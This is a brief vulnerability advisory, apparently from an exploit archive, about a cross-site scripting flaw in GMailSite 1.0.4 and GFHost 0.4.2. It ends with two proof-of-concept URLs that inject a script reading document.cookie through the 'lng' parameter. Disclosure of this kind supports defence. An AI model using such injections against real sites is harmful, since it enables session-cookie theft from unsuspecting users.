GMailSite 1.0.x - Cross-Site Scripting Vulnerability

2005-12-29
ID: 48908
Download vulnerable application: None
source: http://www.securityfocus.com/bid/16081/info

GMailSite is prone to a cross-site scripting vulnerability.

An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.

GMailSite 1.0.4 and prior versions are affected by this issue. GFHost 0.4.2 and prior versions are also vulnerable.

http://www.example.com/?lng=es"><script>alert(document.cookie)</script>
http://www.example.com/index.php?lng=es"><script>alert(document.cookie)</script>
1-4-2 (www02)